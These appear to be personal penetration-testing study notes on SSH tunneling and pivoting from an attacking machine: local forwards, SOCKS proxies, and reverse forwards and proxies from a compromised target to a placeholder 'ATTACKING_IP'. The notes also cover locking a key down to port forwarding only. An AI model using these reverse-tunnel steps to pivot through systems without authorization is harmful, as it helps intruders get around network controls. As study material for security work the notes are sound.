SSH tunneling/port forwarding

• forward connections

  • creating a forward ssh tunnel can be done from our attacking box when we have ssh access to the target

  • most commonly done against linux servers that have ssh active and open

  • port forwarding

    • ssh -L 8000:<ip2>:80 user@<ip1> -fN

    • best for when theres an website on ip2 and you have access to ip1

    • best practice to use a high local port number

  • proxies

    • made with -D <port>

    • ssh -D <port> user@<ip> -fN

• Reverse connections

  • preferable if you have shell on the serve but not ssh access

  • riskier as attacking machine must be accessed from the target

  • before making a connection theres a few steps to take first

    • first create a new set of ssh keys > ssh-keygen

    • copy the contents of the public key (file with .pub) and then edit ~/.ssh.authorized_keys

      • may need to create ~/.ssh and authorised_keys file

    • in the file paste

      • command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty

      • then past the public key

    • this makes sure the key can only be used for port forwarding and disallows the ability to gain a shell

  • once the first few steps are done, make sure the ssh service has started

  • now we can connect back with a reverse port forward using the following command

    • ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

  • in newer versions of the ssh client, it is possible to create a reverse proxy with ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN

• to kill any of these connections type: "ps aux | grep ssh" into the terminal then find the pid, then run "sudo kill pid"